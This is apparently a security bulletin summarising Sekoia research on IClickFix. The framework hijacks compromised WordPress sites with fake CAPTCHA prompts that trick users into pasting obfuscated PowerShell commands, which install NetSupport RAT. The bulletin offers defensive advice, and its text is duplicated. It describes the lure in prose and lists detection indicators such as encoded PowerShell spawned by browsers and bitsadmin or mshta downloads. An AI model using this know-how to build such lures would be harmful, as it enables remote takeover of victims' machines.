Meet IClickfix: A Widespread Wordpress-Targeting Framework Using the Clickfix Tactic
Summary:
Sekoia.io researchers have identified a widespread malicious framework dubbed "IClickFix," which automates the deployment of the "ClickFix" social engineering tactic across compromised WordPress websites. Unlike previous iterations of ClickFix that were often part of highly targeted or manual campaigns, IClickFix is a modular JavaScript-based framework designed for mass distribution. The attack chain begins when a user visits a legitimate but compromised WordPress site. The framework injects a multi-stage JavaScript loader that hijacks the page, replacing the original content with a fake Cloudflare Turnstile CAPTCHA or a "unusual traffic detected" alert. When the user attempts to solve the CAPTCHA by clicking a button, they are presented with instructions to "fix" the error by copying a command to their clipboard and pasting it into the Windows Run dialog or a PowerShell terminal. This command executes an obfuscated PowerShell script that bypasses traditional browser security controls—since the browser itself never downloads a file—and ultimately installs the NetSupport Remote Access Trojan (RAT). While the lure is visually similar to the well-known "ClearFake" cluster, Sekoia assesses with high confidence that IClickFix is a distinct, slightly less sophisticated framework likely operated by different cybercriminals.
Security Officer Comments:
The emergence of IClickFix is particularly concerning because it targets the human element at a point where technical controls are often weakest. By tricking users into manually executing commands, the threat actors effectively bypass "Safe Browsing" features in Chrome or Edge that would typically flag a malicious download. Spanning critical infrastructure, service providers, and software developers, this poses a dual-sided risk. First, organizations own public-facing WordPress sites could be compromised and used as "watering holes" to infect their customers, leading to significant reputational and supply-chain damage. Second, employees across all sectors are susceptible to these lures, as CAPTCHA challenges are a routine part of the modern web experience.
The delivery of NetSupport RAT is often just the "foot in the door." Once this RAT is established, it provides attackers with full remote control, which can be leveraged for lateral movement, credential harvesting, or as a precursor to ransomware deployment. The use of a Traffic Distribution System (TDS) by the IClickFix operators further complicates detection, as it allows them to filter traffic and only serve the malicious payload to specific targets (e.g., users from specific geographic regions or using specific operating systems), making the framework highly resilient against automated security scanners.
Suggested Corrections:
To defend against the IClickFix framework and the broader ClickFix tactic, we recommend a multi-layered approach focusing on both endpoint hardening and user awareness:
Link(s):
https://blog.sekoia.io/meet-iclickf...argeting-framework-using-the-clickfix-tactic/
Sekoia.io researchers have identified a widespread malicious framework dubbed "IClickFix," which automates the deployment of the "ClickFix" social engineering tactic across compromised WordPress websites. Unlike previous iterations of ClickFix that were often part of highly targeted or manual campaigns, IClickFix is a modular JavaScript-based framework designed for mass distribution. The attack chain begins when a user visits a legitimate but compromised WordPress site. The framework injects a multi-stage JavaScript loader that hijacks the page, replacing the original content with a fake Cloudflare Turnstile CAPTCHA or a "unusual traffic detected" alert. When the user attempts to solve the CAPTCHA by clicking a button, they are presented with instructions to "fix" the error by copying a command to their clipboard and pasting it into the Windows Run dialog or a PowerShell terminal. This command executes an obfuscated PowerShell script that bypasses traditional browser security controls—since the browser itself never downloads a file—and ultimately installs the NetSupport Remote Access Trojan (RAT). While the lure is visually similar to the well-known "ClearFake" cluster, Sekoia assesses with high confidence that IClickFix is a distinct, slightly less sophisticated framework likely operated by different cybercriminals.
Security Officer Comments:
The emergence of IClickFix is particularly concerning because it targets the human element at a point where technical controls are often weakest. By tricking users into manually executing commands, the threat actors effectively bypass "Safe Browsing" features in Chrome or Edge that would typically flag a malicious download. Spanning critical infrastructure, service providers, and software developers, this poses a dual-sided risk. First, organizations own public-facing WordPress sites could be compromised and used as "watering holes" to infect their customers, leading to significant reputational and supply-chain damage. Second, employees across all sectors are susceptible to these lures, as CAPTCHA challenges are a routine part of the modern web experience.
The delivery of NetSupport RAT is often just the "foot in the door." Once this RAT is established, it provides attackers with full remote control, which can be leveraged for lateral movement, credential harvesting, or as a precursor to ransomware deployment. The use of a Traffic Distribution System (TDS) by the IClickFix operators further complicates detection, as it allows them to filter traffic and only serve the malicious payload to specific targets (e.g., users from specific geographic regions or using specific operating systems), making the framework highly resilient against automated security scanners.
Suggested Corrections:
To defend against the IClickFix framework and the broader ClickFix tactic, we recommend a multi-layered approach focusing on both endpoint hardening and user awareness:
- Endpoint PowerShell Restrictions: The most effective technical mitigation is to restrict PowerShell execution for standard users. Implementing Constrained Language Mode (CLM) and using Windows Defender Application Control (WDAC) or AppLocker to block the execution of unassigned scripts can prevent the final stage of the attack from succeeding.
- User Awareness Training: Traditional "don't click links" training is insufficient for this threat. Organizations should specifically educate employees on the "ClickFix" lure—reminding them that legitimate services (like Cloudflare, Google, or Microsoft) will never ask a user to copy and paste a command into the Windows Run box or a terminal to "fix" a browser error.
- WordPress Security Hardening: For members hosting WordPress sites, it is critical to implement rigorous plugin management and integrity monitoring. Ensure all themes and plugins are updated, utilize Multi-Factor Authentication (MFA) for administrative logins, and use Web Application Firewalls (WAF) to detect and block the injection of malicious JavaScript tags, specifically looking for indicators like ic-tracker-js.
- Behavioral Detection (EDR): Configure EDR solutions to alert on suspicious process parent-child relationships, such as browser.exe or explorer.exe spawning powershell.exe with highly encoded or obfuscated command-line arguments. Monitoring for bitsadmin.exe or mshta.exe usage to download external files is also a key detection opportunity.
Link(s):
https://blog.sekoia.io/meet-iclickf...argeting-framework-using-the-clickfix-tactic/